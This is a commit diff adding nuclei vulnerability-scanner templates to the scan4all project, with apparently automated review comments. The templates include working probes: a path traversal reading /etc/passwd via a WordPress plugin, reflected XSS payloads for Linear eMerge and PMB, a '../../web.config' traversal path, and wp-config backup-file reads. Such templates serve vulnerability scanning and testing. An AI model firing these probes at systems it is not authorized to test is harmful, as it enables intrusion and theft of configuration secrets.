STRLCPY
scan4all
up PoCs 2022-09-01
hktalent
committed
2 years ago
c8e13f02
1 parent
b49ed62a
Total 10 files
config/nuclei-templates/cves/2015/CVE-2015-5469.yaml
1
+
id: CVE-2015-5469
2
+
info:
3
+
name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
4
+
author: 0x_Akoko
5
+
severity: high
6
+
description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
7
+
reference:
8
+
- https://www.openwall.com/lists/oss-security/2015/07/10/5
9
+
- https://www.cvedetails.com/cve/CVE-2015-5469/
10
+
- http://www.vapid.dhs.org/advisory.php?v=133
11
+
- http://www.openwall.com/lists/oss-security/2015/07/10/5
12
+
classification:
13
+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
14
+
cvss-score: 7.5
15
+
cve-id: CVE-2015-5469
16
+
cwe-id: CWE-22
17
+
tags: cve,cve2015,wp,lfi
18
+
19
+
requests:
20
+
- method: GET
21
+
path:
22
+
- "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
23
+
24
+
matchers-condition: and
25
+
matchers:
26
+
27
+
- type: regex
28
+
regex:
29
+
- "root:[x*]:0:0"
30
+
31
+
- type: status
32
+
status:
33
+
- 200
34
+
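Review bot: the reference list carries the same oss-security post twice, once as https://www.openwall.com/lists/oss-security/2015/07/10/5 and once as the http:// form of the same URL; drop one of the two. The regex matcher also sets no part, so adding 'part: body' would make explicit which part of the response 'root:[x*]:0:0' is checked against.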
config/nuclei-templates/cves/2019/CVE-2019-7255.yaml
1
+
id: CVE-2019-7255
2
+
3
+
info:
4
+
name: Linear eMerge E3 - Cross Site Scripting
5
+
author: arafatansari
6
+
severity: medium
7
+
description: |
8
+
Linear eMerge E3-Series devices allow XSS via layout parameter.
9
+
reference:
10
+
- https://www.applied-risk.com/resources/ar-2019-005
11
+
- https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
12
+
- https://nvd.nist.gov/vuln/detail/CVE-2019-7255
13
+
- https://applied-risk.com/labs/advisories
14
+
classification:
15
+
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
16
+
cvss-score: 6.1
17
+
cve-id: CVE-2019-7255
18
+
cwe-id: CWE-79
19
+
metadata:
20
+
shodan-query: http.title:"eMerge"
21
+
verified: "true"
22
+
tags: emerge,xss,packetstorm,cve,cve2019,nortek
23
+
24
+
requests:
25
+
- method: GET
26
+
path:
27
+
- "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
28
+
29
+
matchers-condition: and
30
+
matchers:
31
+
- type: word
32
+
part: body
33
+
words:
34
+
- 'Template : <script>alert(document.domain)</script>'
35
+
36
+
- type: word
37
+
part: header
38
+
words:
39
+
- text/html
40
+
41
+
- type: status
42
+
status:
43
+
- 200
44
+
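Review bot: the description says only 'via layout parameter' and does not name the endpoint the request targets, /badging/badge_template_v0.php; include it so a finding can be triaged without reading the request block. Of the two applied-risk.com references, https://applied-risk.com/labs/advisories looks like a general advisories index rather than this advisory and could be dropped.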
config/nuclei-templates/cves/2022/CVE-2022-2383.yaml
skipped 11 lines
12
12
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
13
13
- https://nvd.nist.gov/vuln/detail/CVE-2022-2383
14
14
classification:
15
+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
16
+
cvss-score: 6.1
15
17
cve-id: CVE-2022-2383
18
+
cwe-id: CWE-79
16
19
metadata:
17
-
verified: true
20
+
verified:
"
true
"
18
21
tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
19
22
20
23
requests:
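Review bot: quoting the value at new line 20 turns metadata 'verified' from a YAML boolean into the string "true", while eMerge-panel.yaml and aws-s3-explorer.yaml in this same commit are added with the bare boolean 'verified: true'. Use one form across the templates so that anything filtering on this field sees a single type.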
skipped 20 lines
config/nuclei-templates/cves/2022/CVE-2022-34328.yaml
1
+
id: CVE-2022-34328
2
+
3
+
info:
4
+
name: PMB 7.3.10 - Cross Site Scripting
5
+
author: edoardottt
6
+
severity: medium
7
+
description: |
8
+
PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.
9
+
reference:
10
+
- https://github.com/jenaye/PMB/blob/main/README.md
11
+
- https://nvd.nist.gov/vuln/detail/CVE-2022-34328
12
+
- https://github.com/jenaye/PMB
13
+
classification:
14
+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
15
+
cvss-score: 6.1
16
+
cve-id: CVE-2022-34328
17
+
cwe-id: CWE-79
18
+
metadata:
19
+
shodan-query: http.html:"PMB Group"
20
+
verified: "true"
21
+
tags: cve,cve2022,pmb,xss
22
+
23
+
requests:
24
+
- method: GET
25
+
path:
26
+
- "{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
27
+
28
+
matchers-condition: and
29
+
matchers:
30
+
- type: word
31
+
part: body
32
+
words:
33
+
- "<script>alert(document.domain)</script>' target='cart_info"
34
+
35
+
- type: word
36
+
part: header
37
+
words:
38
+
- text/html
39
+
40
+
- type: status
41
+
status:
42
+
- 200
43
+
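Review bot: the request path hard-codes id=42691 ahead of the payload; if the reflection in the lvl=author_see page depends on that author record existing, the template will miss affected installations that have no such id. Confirm the reflection is independent of the id value, or say in the description why this value is used. The two github.com/jenaye/PMB references point at the same repository and one would do.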
config/nuclei-templates/exposed-panels/eMerge-panel.yaml
1
+
id: eMerge-panel
2
+
3
+
info:
4
+
name: Nortek Linear eMerge - Panel Detect
5
+
author: arafatansari
6
+
severity: info
7
+
metadata:
8
+
verified: true
9
+
shodan-query: http.title:"eMerge"
10
+
tags: panel,emerge,nortek
11
+
12
+
requests:
13
+
- method: GET
14
+
path:
15
+
- "{{BaseURL}}"
16
+
17
+
matchers-condition: and
18
+
matchers:
19
+
- type: regex
20
+
part: body
21
+
regex:
22
+
- '<title>(.*)Linear eMerge(.*)</title>'
23
+
- '/emerge.ico'
24
+
condition: or
25
+
26
+
- type: status
27
+
status:
28
+
- 200
29
+
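Review bot: in the regex matcher, '/emerge.ico' leaves the dot unescaped, so it matches any character in that position, and the (.*) groups in the title pattern capture text that is never used. Escape the dot ('/emerge\.ico'), or make this a word matcher on 'Linear eMerge' and '/emerge.ico', since neither pattern needs a regex. The id 'eMerge-panel' is also mixed case, while the other non-CVE ids added in this commit (aem-osgi-bundles, aws-s3-explorer, zap-rest-api-detect) are lower case.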
config/nuclei-templates/exposures/configs/web-config.yaml
skipped 1 lines
2
2
3
3
info:
4
4
name: Web Config file
5
-
author: Yash Anand @yashanand155
5
+
author: Yash Anand @yashanand155
,
DhiyaneshDK
6
6
severity: info
7
+
reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
7
8
tags: config,exposure
8
9
9
10
requests:
10
11
- method: GET
11
12
path:
12
13
- '{{BaseURL}}/web.config'
14
+
- '{{BaseURL}}/../../web.config'
13
15
14
16
matchers-condition: and
15
17
matchers:
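Review bot: the added path '{{BaseURL}}/../../web.config' at new line 14 is a path traversal probe inside a template whose severity is info and whose tags are config,exposure. A hit on that path means something different from a directly served /web.config, yet it would be reported under the same id at the same severity; consider a separate template, or at least a description that covers both cases. Also check that the dot segments reach the server as written, since a client or intermediary that normalises the path would turn this into a repeat of the first request. 'reference' is added here as a single scalar, while the other templates in this commit use a list.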
skipped 6 lines
22
24
- type: status
23
25
status:
24
26
- 200
27
+
config/nuclei-templates/misconfiguration/aem/aem-osgi-bundles.yaml
1
+
id: aem-osgi-bundles
2
+
3
+
info:
4
+
name: Adobe AEM Installed OSGI Bundles
5
+
author: dhiyaneshDk
6
+
severity: low
7
+
reference:
8
+
- https://www.slideshare.net/0ang3el/hacking-aem-sites
9
+
metadata:
10
+
shodan-query:
11
+
- http.title:"AEM Sign In"
12
+
- http.component:"Adobe Experience Manager"
13
+
tags: misconfig,aem,adobe
14
+
15
+
requests:
16
+
- method: GET
17
+
path:
18
+
- "{{BaseURL}}/bin.tidy.infinity.json"
19
+
20
+
matchers-condition: and
21
+
matchers:
22
+
- type: word
23
+
words:
24
+
- '"jcr:primaryType":'
25
+
- '"jcr:uuid":'
26
+
condition: and
27
+
28
+
- type: status
29
+
status:
30
+
- 200
31
+
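Review bot: the matchers require only '"jcr:primaryType":' and '"jcr:uuid":', which are generic JCR node properties, so nothing in the check is specific to the OSGI bundles that the id and name claim. Add a word that identifies bundle data in the /bin.tidy.infinity.json response, or rename the template to what it actually detects, and add a description, which is missing. 'shodan-query' is given as a list here, while the other templates in this commit give it as a single string.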
config/nuclei-templates/misconfiguration/aws-s3-explorer.yaml
1
+
id: aws-s3-explorer
2
+
3
+
info:
4
+
name: AWS S3 Explorer
5
+
author: DhiyaneshDk
6
+
severity: low
7
+
reference:
8
+
- https://www.exploit-db.com/ghdb/7967
9
+
metadata:
10
+
verified: true
11
+
google-dork: inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
12
+
tags: s3,edb,misconfig,aws,amazon
13
+
14
+
requests:
15
+
- method: GET
16
+
path:
17
+
- "{{BaseURL}}/index.html"
18
+
19
+
matchers-condition: and
20
+
matchers:
21
+
- type: word
22
+
words:
23
+
- '<title>AWS S3 Explorer</title>'
24
+
25
+
- type: word
26
+
part: header
27
+
words:
28
+
- text/html
29
+
30
+
- type: status
31
+
status:
32
+
- 200
33
+
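Review bot: info has no description, so a severity: low result gives no indication of why an exposed AWS S3 Explorer page matters or what to do about it; add one. The title matcher also sets no part while the text/html matcher sets 'part: header'; add 'part: body' to the first for consistency.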
config/nuclei-templates/technologies/zap-api-detect.yaml
1
+
id: zap-rest-api-detect
2
+
3
+
info:
4
+
name: ZAP Rest API Server Running
5
+
author: hahwul
6
+
severity: info
7
+
reference:
8
+
- https://www.zaproxy.org/docs/api/
9
+
tags: zap,tech
10
+
11
+
requests:
12
+
- method: GET
13
+
path:
14
+
- "{{BaseURL}}"
15
+
16
+
matchers:
17
+
- type: word
18
+
part: response
19
+
words:
20
+
- '<title>ZAP API UI</title>'
21
+
- 'Welcome to the OWASP Zed Attack Proxy (ZAP)'
22
+
- 'Access-Control-Allow-Headers: ZAP-Header'
23
+
condition: or
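Review bot: the id is 'zap-rest-api-detect' but the file is zap-api-detect.yaml; make the two agree so results can be traced back to the template file. There is also no description, and the three words are combined with 'condition: or', so the single string 'Welcome to the OWASP Zed Attack Proxy (ZAP)' anywhere in a response is enough to report a running API server; requiring the title together with one of the other two would be tighter.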
config/nuclei-templates/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
skipped 1 lines
2
2
3
3
info:
4
4
name: WordPress wp-config Detection
5
-
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
5
+
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
,
tess
6
6
severity: medium
7
7
description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
8
8
classification:
skipped 23 lines
32
32
- '{{BaseURL}}/wp-config.php~'
33
33
- '{{BaseURL}}/wp-config.php-backup'
34
34
- '{{BaseURL}}/wp-config.php.orig'
35
+
- '{{BaseURL}}/wp-config.php_orig'
35
36
- '{{BaseURL}}/wp-config.php.original'
36
37
- '{{BaseURL}}/_wpeprivate/config.json'
37
38
skipped 16 lines